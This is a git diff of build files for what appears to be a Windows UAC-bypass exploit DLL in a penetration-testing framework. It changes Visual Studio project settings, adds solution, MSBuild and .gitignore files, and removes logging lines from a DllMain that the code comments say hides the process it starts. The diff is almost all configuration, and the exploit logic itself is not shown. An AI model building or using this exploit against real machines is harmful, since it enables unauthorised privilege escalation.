</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
@ -64,25 +68,30 @@
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>true</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>true</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -90,11 +99,16 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -102,11 +116,16 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -117,6 +136,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
|
@ -124,6 +144,9 @@
|
||||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -134,6 +157,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
|
@ -145,6 +169,9 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="stdafx.h" />
|
<ClInclude Include="stdafx.h" />
|
||||||
|
|
3
external/source/exploits/bypassuac/Win7ElevateDll/dllmain.cpp
vendored
Normal file → Executable file
3
external/source/exploits/bypassuac/Win7ElevateDll/dllmain.cpp
vendored
Normal file → Executable file
|
@ -17,7 +17,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
|
||||||
// Wee need to hide fact that we've started process thats why we immediately
|
// Wee need to hide fact that we've started process thats why we immediately
|
||||||
// Terminate host application.
|
// Terminate host application.
|
||||||
//
|
//
|
||||||
CLogger::LogLine(TEXT("DLL: Hello"));
|
|
||||||
|
|
||||||
switch (ul_reason_for_call)
|
switch (ul_reason_for_call)
|
||||||
{
|
{
|
||||||
|
@ -33,8 +32,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
|
||||||
startupInfo.cb = sizeof(startupInfo);
|
startupInfo.cb = sizeof(startupInfo);
|
||||||
PROCESS_INFORMATION processInfo = {0};
|
PROCESS_INFORMATION processInfo = {0};
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("DLL: TIOR shell="));
|
|
||||||
CLogger::LogLine(cmd);
|
|
||||||
|
|
||||||
//
|
//
|
||||||
// Create not visible window
|
// Create not visible window
|
||||||
|
|
|
@ -0,0 +1,19 @@
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
|
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<PropertyGroup>
|
||||||
|
<SolutionPath>.\Win7Elevate.sln</SolutionPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<Target Name="all" DependsOnTargets="x86;x64" />
|
||||||
|
|
||||||
|
<Target Name="x86">
|
||||||
|
<Message Text="Building bypassuac x86" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
|
||||||
|
<Target Name="x64">
|
||||||
|
<Message Text="Building bypassuac x64" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
</Project>
|
||||||
|
|
|
@ -0,0 +1,151 @@
|
||||||
|
## Ignore Visual Studio temporary files, build results, and
|
||||||
|
## files generated by popular Visual Studio add-ons.
|
||||||
|
|
||||||
|
# User-specific files
|
||||||
|
*.suo
|
||||||
|
*.user
|
||||||
|
*.sln.docstates
|
||||||
|
|
||||||
|
# Build results
|
||||||
|
|
||||||
|
[Dd]ebug/
|
||||||
|
[Rr]elease/
|
||||||
|
x64/
|
||||||
|
build/
|
||||||
|
[Bb]in/
|
||||||
|
[Oo]bj/
|
||||||
|
|
||||||
|
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
|
||||||
|
!packages/*/build/
|
||||||
|
|
||||||
|
# MSTest test Results
|
||||||
|
[Tt]est[Rr]esult*/
|
||||||
|
[Bb]uild[Ll]og.*
|
||||||
|
|
||||||
|
*_i.c
|
||||||
|
*_p.c
|
||||||
|
*.ilk
|
||||||
|
*.meta
|
||||||
|
*.obj
|
||||||
|
*.pch
|
||||||
|
*.pdb
|
||||||
|
*.pgc
|
||||||
|
*.pgd
|
||||||
|
*.rsp
|
||||||
|
*.sbr
|
||||||
|
*.tlb
|
||||||
|
*.tli
|
||||||
|
*.tlh
|
||||||
|
*.tmp
|
||||||
|
*.tmp_proj
|
||||||
|
*.log
|
||||||
|
*.vspscc
|
||||||
|
*.vssscc
|
||||||
|
.builds
|
||||||
|
*.pidb
|
||||||
|
*.log
|
||||||
|
*.scc
|
||||||
|
|
||||||
|
# Visual C++ cache files
|
||||||
|
ipch/
|
||||||
|
*.aps
|
||||||
|
*.ncb
|
||||||
|
*.opensdf
|
||||||
|
*.sdf
|
||||||
|
*.cachefile
|
||||||
|
|
||||||
|
# Visual Studio profiler
|
||||||
|
*.psess
|
||||||
|
*.vsp
|
||||||
|
*.vspx
|
||||||
|
|
||||||
|
# Guidance Automation Toolkit
|
||||||
|
*.gpState
|
||||||
|
|
||||||
|
# ReSharper is a .NET coding add-in
|
||||||
|
_ReSharper*/
|
||||||
|
*.[Rr]e[Ss]harper
|
||||||
|
|
||||||
|
# TeamCity is a build add-in
|
||||||
|
_TeamCity*
|
||||||
|
|
||||||
|
# DotCover is a Code Coverage Tool
|
||||||
|
*.dotCover
|
||||||
|
|
||||||
|
# NCrunch
|
||||||
|
*.ncrunch*
|
||||||
|
.*crunch*.local.xml
|
||||||
|
|
||||||
|
# Installshield output folder
|
||||||
|
[Ee]xpress/
|
||||||
|
|
||||||
|
# DocProject is a documentation generator add-in
|
||||||
|
DocProject/buildhelp/
|
||||||
|
DocProject/Help/*.HxT
|
||||||
|
DocProject/Help/*.HxC
|
||||||
|
DocProject/Help/*.hhc
|
||||||
|
DocProject/Help/*.hhk
|
||||||
|
DocProject/Help/*.hhp
|
||||||
|
DocProject/Help/Html2
|
||||||
|
DocProject/Help/html
|
||||||
|
|
||||||
|
# Click-Once directory
|
||||||
|
publish/
|
||||||
|
|
||||||
|
# Publish Web Output
|
||||||
|
*.Publish.xml
|
||||||
|
*.pubxml
|
||||||
|
|
||||||
|
# NuGet Packages Directory
|
||||||
|
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
|
||||||
|
#packages/
|
||||||
|
|
||||||
|
# Windows Azure Build Output
|
||||||
|
csx
|
||||||
|
*.build.csdef
|
||||||
|
|
||||||
|
# Windows Store app package directory
|
||||||
|
AppPackages/
|
||||||
|
|
||||||
|
# Others
|
||||||
|
sql/
|
||||||
|
*.Cache
|
||||||
|
ClientBin/
|
||||||
|
[Ss]tyle[Cc]op.*
|
||||||
|
~$*
|
||||||
|
*~
|
||||||
|
*.dbmdl
|
||||||
|
*.[Pp]ublish.xml
|
||||||
|
*.pfx
|
||||||
|
*.publishsettings
|
||||||
|
|
||||||
|
# RIA/Silverlight projects
|
||||||
|
Generated_Code/
|
||||||
|
|
||||||
|
# Backup & report files from converting an old project file to a newer
|
||||||
|
# Visual Studio version. Backup files are not needed, because we have git ;-)
|
||||||
|
_UpgradeReport_Files/
|
||||||
|
Backup*/
|
||||||
|
UpgradeLog*.XML
|
||||||
|
UpgradeLog*.htm
|
||||||
|
|
||||||
|
# SQL Server files
|
||||||
|
App_Data/*.mdf
|
||||||
|
App_Data/*.ldf
|
||||||
|
|
||||||
|
# =========================
|
||||||
|
# Windows detritus
|
||||||
|
# =========================
|
||||||
|
|
||||||
|
# Windows image file caches
|
||||||
|
Thumbs.db
|
||||||
|
ehthumbs.db
|
||||||
|
|
||||||
|
# Folder config file
|
||||||
|
Desktop.ini
|
||||||
|
|
||||||
|
# Recycle Bin used on file shares
|
||||||
|
$RECYCLE.BIN/
|
||||||
|
|
||||||
|
# Mac crap
|
||||||
|
.DS_Store
|
|
@ -0,0 +1,28 @@
|
||||||
|
|
||||||
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
|
# Visual Studio 2013
|
||||||
|
VisualStudioVersion = 12.0.21005.1
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bypassuac", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
|
||||||
|
EndProject
|
||||||
|
Global
|
||||||
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
Debug|Win32 = Debug|Win32
|
||||||
|
Debug|x64 = Debug|x64
|
||||||
|
Release|Win32 = Release|Win32
|
||||||
|
Release|x64 = Release|x64
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
|
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
|
||||||
|
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
|
||||||
|
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
|
||||||
|
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
|
||||||
|
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
|
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
|
||||||
|
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
|
||||||
|
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
|
HideSolutionNode = FALSE
|
||||||
|
EndGlobalSection
|
||||||
|
EndGlobal
|
|
@ -0,0 +1,204 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Debug|x64">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|x64">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
</ItemGroup>
|
||||||
|
<PropertyGroup Label="Globals">
|
||||||
|
<ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
|
||||||
|
<RootNamespace>reflective_dll</RootNamespace>
|
||||||
|
<Keyword>Win32Proj</Keyword>
|
||||||
|
<ProjectName>bypassuac</ProjectName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<PropertyGroup Label="UserMacros" />
|
||||||
|
<PropertyGroup>
|
||||||
|
<_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\</IntDir>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||||
|
<IntDir>$(Platform)\$(Configuration)\</IntDir>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\</IntDir>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName)-x86</TargetName>
|
||||||
|
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\</IncludePath>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\</IntDir>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName)-x64</TargetName>
|
||||||
|
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
|
||||||
|
</PropertyGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MinimalRebuild>true</MinimalRebuild>
|
||||||
|
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<Midl>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MinimalRebuild>true</MinimalRebuild>
|
||||||
|
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<TargetMachine>MachineX64</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>MaxSpeed</Optimization>
|
||||||
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
